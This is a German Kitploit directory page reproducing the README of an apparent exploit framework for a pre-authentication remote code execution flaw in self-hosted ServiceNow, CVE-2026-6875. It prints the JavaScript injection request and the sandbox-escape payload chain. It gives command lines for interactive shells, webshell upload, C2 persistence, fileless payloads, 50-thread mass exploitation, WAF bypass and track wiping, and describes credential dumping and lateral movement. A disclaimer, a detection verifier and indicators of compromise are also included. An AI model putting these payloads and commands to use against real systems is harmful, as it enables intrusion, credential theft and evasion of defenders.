Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-6875-PoC-Exploit — CVE-2026-6875 ServiceNow Pre-Auth RCE Framework 🔥 JS Injection → Sandbox Escape → RCE → Root. Funktionen: --detect, --exec, Reverse-Shell/interaktive Shell, Batch-Threading, WAF-Bypass, Persistenz, Lateral Movement, Credential-Dump, fileless-Ausführung, Spuren verwischen. 🛡️ CVSS 9.5 aktiv ausgenutzt. Nur für autorisierte und legale Nutzung. Bleiben Sie legal. 🔒 | Kitploit
Tools/GitHubGitHub/tc4dy/cve-2026-6875-poc-exploit
Privilege EscalationSchwachstellenscannerPersistenzmechanismenExploitationLaterale BewegungWebanwendungs-ExploitationPost-ExploitationWAF-UmgehungPenetrationstests

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2026-6875 ServiceNow Pre-Auth RCE Framework 🔥 JS Injection → Sandbox Escape → RCE → Root. Funktionen: --detect, --exec, Reverse-Shell/interaktive Shell, Batch-Threading, WAF-Bypass, Persistenz, Lateral Movement, Credential-Dump, fileless-Ausführung, Spuren verwischen. 🛡️ CVSS 9.5 aktiv ausgenutzt. Nur für autorisierte und legale Nutzung. Bleiben Sie legal. 🔒

Remote-Access-Tool
GitHubtc4dy/cve-2026-6875-poc-exploit

CVE-2026-6875-PoC-Exploit

Repository anzeigen
39vor 1 MonatNoch nicht geprüft
Teilen

CVE-2026-6875

CVE-2026-6875 - ServiceNow Pre-Auth-RCE-Exploit-Framework & PoC-Verifier 🔥

CVE-2026-6875 CVSS 9.5 CISA KEV Python 3.6+

Pre-Auth RCE Sandbox Escape Privesc Windows Ready

ServiceNow AI Platform — JavaScript-Injection → Sandbox-Escape → RCE → Root-Privesc

Exploit-Framework & sicherer Verifier
Nur für autorisierte Sicherheitstests.


⚖️ Rechtlicher Haftungsausschluss & verantwortungsvolle Nutzung

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt.

Die Autoren und Mitwirkenden sind nicht verantwortlich für Missbrauch oder Schäden, die durch diese Software verursacht werden. Die Benutzer sind allein dafür verantwortlich, vor dem Testen die ausdrückliche schriftliche Genehmigung des Eigentümers des Zielsystems einzuholen. Unbefugter Zugriff auf Computersysteme ist gemäß dem Computer Fraud and Abuse Act (CFAA) und ähnlichen Gesetzen weltweit illegal.

Durch die Nutzung dieser Software stimmst du Folgendem zu:

  • Nutze sie nur auf Systemen, die dir gehören oder für die du eine ausdrückliche Testgenehmigung hast.
  • Halte alle geltenden lokalen, regionalen und bundesrechtlichen Gesetze ein.
  • Nutze sie nicht für böswillige, destruktive oder illegale Aktivitäten.

⚠️ WARNUNG: Diese Schwachstelle wird derzeit aktiv in freier Wildbahn ausgenutzt. Unbefugte Nutzung kann zu schwerwiegenden rechtlichen Konsequenzen führen.


🔥 Überblick über die Schwachstelle

CVE-2026-6875 ist eine kritische Schwachstelle für nicht authentifizierte Remote-Code-Ausführung (RCE) in der ServiceNow AI Platform (ehemals Now Platform). Sie ermöglicht es Angreifern, die Script-Sandbox zu umgehen und beliebige Systembefehle mit den Berechtigungen der ServiceNow-Anwendung auszuführen.

So funktioniert es:

  1. JavaScript-Injection: Der Endpunkt assessment_thanks.do akzeptiert einen Parameter sysparm_assessable_type. Durch das Voranstellen von javascript: injiziert ein Angreifer beliebigen JavaScript-Code.

  2. Sandbox-Escape: Ein ausgeklügeltes Sandbox-Escape-Gadget (Verkettung von DiscoveryFunctions.getCacheObjectForTable, AbstractAjaxProcessor und Class.create) hebt die JavaScript-Sandbox-Einschränkung auf.

  3. Remote-Code-Ausführung: Der injizierte Java-Code (über java.lang.Runtime.exec()) läuft mit den Berechtigungen der ServiceNow-Anwendung und ermöglicht eine vollständige Systemkompromittierung.

  4. Privilegienerweiterung: Post-Exploitation-Module versuchen, über sudo-Fehlkonfigurationen, SUID-Binaries, beschreibbare Cron-Jobs oder Kernel-Exploits auf root zu eskalieren.

Wichtige Fakten:


🛠️ Exploit-Framework (exploit.py)

Der vollständig einsatzbereite Exploit verknüpft die JavaScript-Injection und den Sandbox-Escape, um Remote-Code-Ausführung zu erreichen, mit erweiterten Post-Exploitation-Modulen für Persistenz, Lateral Movement und das Auslesen von Zugangsdaten.

✨ Funktionen

Befehle der interaktiven Shell


🕵️ Sicherer Verifier (verifier.py)

Der sichere Verifier führt eine nicht-intrusive Schwachstellenerkennung durch, ohne schädliche Payloads auszuführen oder Systemänderungen vorzunehmen.

✨ Funktionen


📦 Installation & Anforderungen

Voraussetzungen

  • Python 3.6+
  • pip (für die requests-Bibliothek)

Abhängigkeiten installieren

root@kitploit:~
pip install requests urllib3

[!NOTE] exploit.py verwendet für die Kernfunktionalität nur die Standardbibliothek; requests wird nur für die --detect-Funktion, --webhook-Benachrichtigungen und den sicheren Verifier benötigt.


🚀 Anwendungsbeispiele

[1] Sicherer Verifier (verifier.py)

root@kitploit:~
# Single target verification
python verifier.py -u 192.168.1.100

# Custom port and path
python verifier.py -u 10.0.0.5 -p 8443 --path /snow

# Mass scan from file
python verifier.py -l targets.txt -o results.json

# Quiet mode (only vulnerable targets)
python verifier.py -u 192.168.1.100 -q

# Increase timeout for slow targets
python verifier.py -u servicenow.example.com --timeout 60

# Custom User-Agent
python verifier.py -u 192.168.1.100 --user-agent "MyScanner/1.0"

[2] Exploit-Framework (exploit.py)

root@kitploit:~
# Interactive shell on target
python exploit.py -u 192.168.1.100

# Execute a single command
python exploit.py -u 192.168.1.100 --exec "id && whoami"

# Read a file
python exploit.py -u 192.168.1.100 --read-file /etc/passwd

# Enable detection before exploitation
python exploit.py -u 192.168.1.100 --detect

# Attempt root privilege escalation
python exploit.py -u 192.168.1.100 --privesc

# Upload a webshell
python exploit.py -u 192.168.1.100 --upload shell.jsp

# Install persistence with C2
python exploit.py -u 192.168.1.100 --persistence --c2-host 10.0.0.5 --c2-port 4444

# Clean tracks after exploit
python exploit.py -u 192.168.1.100 --clean

# Use fileless (memory) payload
python exploit.py -u 192.168.1.100 --fileless --c2-host 10.0.0.5 --c2-port 4444

# Mass exploit from file (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"

# Custom callback server port
python exploit.py -u 192.168.1.100 --callback-port 9090

# Enable WAF bypass techniques
python exploit.py -u 192.168.1.100 --waf-bypass

# Send notifications via webhook
python exploit.py -u 192.168.1.100 --webhook https://myhook.com/snow

# Pipe mode (read command from stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100

# Custom port and path
python exploit.py -u 10.0.0.5 -p 8443 --path /snow

# Disable TLS verification (for self-signed certs)
python exploit.py -u 192.168.1.100 --insecure-tls

# Custom timeout and retries
python exploit.py -u 192.168.1.100 -t 60 -r 5 -d 2.0

🎯 Betroffene Versionen

⚠️ Wichtig: ServiceNow-Cloud-Instanzen werden automatisch gepatcht. Diese Schwachstelle betrifft hauptsächlich selbst gehostete Bereitstellungen.


🧠 Technischer Deep Dive

1. JavaScript-Injection (CVE-2026-6875)

Die Schwachstelle befindet sich im Endpunkt assessment_thanks.do, der einen Parameter sysparm_assessable_type akzeptiert. Durch die Angabe eines Werts, der mit javascript: beginnt, führt die Plattform das nachfolgende JavaScript im Systemkontext aus.

Verwundbarer Endpunkt:

POST /assessment_thanks.do sysparm_assessable_type=javascript:gs.print('test')

2. Sandbox-Escape-Gadget

Der injizierte Code ist zunächst auf eine Sandbox beschränkt. Durch Ausnutzen der folgenden Kette wird die Sandbox jedoch umgangen:

root@kitploit:~
javascript:
var s="<payload>";
DiscoveryFunctions.getCacheObjectForTable=Object;
var a={};a.get=Object;
var b=new AbstractAjaxProcessor();
b.initialize=DiscoveryFunctions.getFirstValueFromTable(
  a,"",DiscoveryFunctions.getFirstValueFromTable(
    a,"",DiscoveryFunctions.getFirstValueFromTable(
      a,"",global,"WorkflowIconsSCR",""),"prototype",""),"initialize","");
b.a=Class.create();b.a(s);

Die Sandbox wird umgangen, wodurch vollständiger Zugriff auf Java-Klassen wie java.lang.Runtime gewährt wird.

3. Post-Exploitation-Module

Credential-Dumping

Durchsucht .properties-, .xml- und .conf-Dateien nach Passwörtern, API-Schlüsseln und Geheimnissen:

  • /opt/ServiceNow/conf/*.xml
  • /var/log/ServiceNow/*.log
  • /etc/passwd, /etc/shadow

Persistenz

Installiert Backdoors über:

  • Linux: Cron-Jobs (*/5 * * * *), systemd-Dienste, SSH-Schlüssel
  • Windows: Geplante Aufgaben (schtasks), Registry-Autostart-Schlüssel

Lateral Movement

Scannt das lokale Subnetz nach anderen ServiceNow-Instanzen oder SSH-Hosts und verwendet entdeckte Zugangsdaten erneut.

Fileless-Ausführung

Kompiliert eine Java-Klasse spontan, lädt sie über ClassLoader und führt sie im Arbeitsspeicher aus (keine Schreibvorgänge auf der Festplatte).

WAF-Bypass-Techniken

  1. Doppelte URL-Kodierung
  2. JavaScript-Kommentare ({/*comment*/})
  3. Unicode-Escaping (\u0077 für w)
  4. Leerzeichen-Injektion
  5. Schlüsselwort-Aufteilung (ne\u0077 für new)
  6. Zufällige Technikauswahl

🔍 Kompromittierungsindikatoren (IoCs)

Log-Analyse

Durchsuche deine ServiceNow-Logs nach:

  • extraweb_access.log – Anfragen an /assessment_thanks.do mit sysparm_assessable_type, die Folgendes enthalten:
    • javascript:
    • Base64-kodierte Zeichenfolgen
    • DiscoveryFunctions.getCacheObjectForTable
    • AbstractAjaxProcessor

Dateisystem

  • Unerwartete Dateien in /var/tmp/ (z. B. shell.jsp, .sh-Skripte)
  • Modifizierte /etc/passwd, /etc/shadow oder ~/.ssh/authorized_keys
  • Neue Cron-Jobs (crontab -l)
  • Neue systemd-Dienste (/etc/systemd/system/)

Prozesse

  • Verdächtige Prozesse (/bin/bash -i, nc, curl, wget, python -c)
  • Unerwartete Netzwerkverbindungen zu externen IPs

Netzwerk

  • Ausgehende Verbindungen vom ServiceNow-Server zu nicht autorisierten IPs
  • Reverse-Shell-Verbindungen auf ungewöhnlichen Ports

📚 Referenzen

  • NVD - CVE-2026-6875
  • ServiceNow Security Advisory (KB3137947)
  • CISA-KEV-Katalog
  • Searchlight Cyber – Technischer Bericht
  • The Hacker News – ServiceNow-Zero-Day ausgenutzt

🔗 Weitere Exploits

[+] CVE-2026-15409/15410 - SonicWall SMA1000 Multi-Exploit-Framework
https://github.com/tc4dy/CVE-2026-15409-15410-Framework

[+] CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit

[+] CVE-2026-57821 - Apache Fineract SQL-Injection-Toolkit
https://github.com/tc4dy/CVE-2026-57821-PoC-Exploit

[+] CVE-2026-41940 - cPanel/WHM-Authentifizierungs-Bypass
https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit

Tool herunterladen
AttributWert
📅 Entdeckt1. April 2026 (Searchlight Cyber)
⚠️ CVSS-Score9.5 (KRITISCH)
📋 CISA KEVHinzugefügt am 13. Juli 2026
🎯 Betroffene ProdukteSelbst gehostete ServiceNow AI Platform
🔄 Behobene VersionenBrazil EA/GA, Australia Patch 2, Zurich Patch 7b/9, Yokohama Patch 12 Hot Fix 1b/13
🔓 AuthentifizierungNicht erforderlich (Pre-Auth)
🌍 Aktive AusnutzungIn freier Wildbahn bestätigt (Juli 2026)
FunktionBeschreibung
🚀 JavaScript-InjectionInjiziert Payload über den Parameter sysparm_assessable_type.
💻 Sandbox-EscapeUmgeht die Script-Sandbox von ServiceNow, um beliebigen Java-Code auszuführen.
🔐 Interaktive ShellStartet eine Live-Shell mit Unterstützung für mehrere Befehle.
👑 Root-PrivescPrüft auf sudo-Fehlkonfigurationen, SUID-Binaries und Cron-Jobs.
📁 DateioperationenLädt Webshells hoch und liest/lädt Dateien per Base64-Kodierung herunter.
🌐 Batch-ScanningNutzt mehrere Ziele massenhaft mit Threading aus (-l-Flag).
🎯 Sichere ErkennungOptionales --detect-Flag für nicht-intrusive Schwachstellenprüfung.
⚙️ WAF-BypassIntegrierte Verschleierungstechniken zur Umgehung von WAF/IDS (6 Techniken).
🧩 PersistenzInstalliert Cron-/systemd-/schtasks-Backdoors.
🔍 Lateral MovementScannt das lokale Netzwerk nach anderen verwundbaren Hosts und versucht SSH-/SSRF-Ausbreitung.
🧹 Spuren verwischenEntfernt Logs, Bash-Historie und Audit-Trails.
💾 Fileless-AusführungNutzt den Java-ClassLoader, um im Arbeitsspeicher residierende Payloads ohne Schreiben auf die Festplatte auszuführen.
🔌 Callback-ServerIntegrierter HTTP-Server zum Empfangen von Befehlsausgaben (optional).
📢 Webhook-BenachrichtigungenSendet Ergebnisse an eine benutzerdefinierte URL (Slack, Discord usw.).
🪟 PlattformübergreifendUnterstützt Linux- und Windows-Ziele (cmd.exe / PowerShell).
🔒 Thread-sicherVerwendet Sperrmechanismen für gleichzeitige Operationen.
📊 VersionserkennungErkennt die ServiceNow-Version (Zurich/Brazil/Australia/Yokohama).
BefehlBeschreibung
exec <cmd>Systembefehl ausführen
upload <local> [remote]Webshell auf das Ziel hochladen
download <remote>Datei herunterladen und Inhalt anzeigen
privescPrivilegienerweiterung versuchen
reverse <host> <port>Reverse Shell senden
dumpcredZugangsdaten aus ServiceNow-Konfigurationen auslesen
persist <host> <port>Persistenz installieren (cron/systemd/schtasks)
lateralLateral Movement versuchen
cleanSpuren verwischen (Logs, Historie)
memory <host> <port>Fileless-Java-Payload ausführen
exitInteraktive Shell beenden
FunktionBeschreibung
🔍 ServiceNow-ErkennungIdentifiziert ServiceNow-Instanzen über mehrere Endpunkte.
📊 VersionserkennungErkennt spezifische ServiceNow-Releases und Patch-Level.
🧪 JavaScript-Injection-TestTestet auf Injectionschwachstellen mit sicheren gs.print()-Payloads.
🔒 Sandbox-Escape-TestVerifiziert den Sandbox-Escape ohne destruktive Befehle.
📈 Konfidenz-ScoringLiefert einen Konfidenzwert in Prozent (85–95 %) basierend auf der Evidenz.
📋 JSON-AusgabeExportiert Ergebnisse im JSON-Format für Berichte.
🔄 Massen-ScanningScannt mehrere Ziele mit Threading-Unterstützung.
🎯 Nicht-intrusivFührt nur das harmlose uname -a zur Systemabfrage aus.
ServiceNow-ReleaseVerwundbare VersionenBehobene Versionen
BrazilEA, GAGepatcht (nach GA)
AustraliaVor Patch 2Patch 2+
ZurichVor Patch 7b, Patch 9Patch 7b, Patch 9+
YokohamaVor Patch 12 Hot Fix 1bPatch 12 Hot Fix 1b, Patch 13
Andere ReleasesUnbekanntOffizielles Advisory prüfen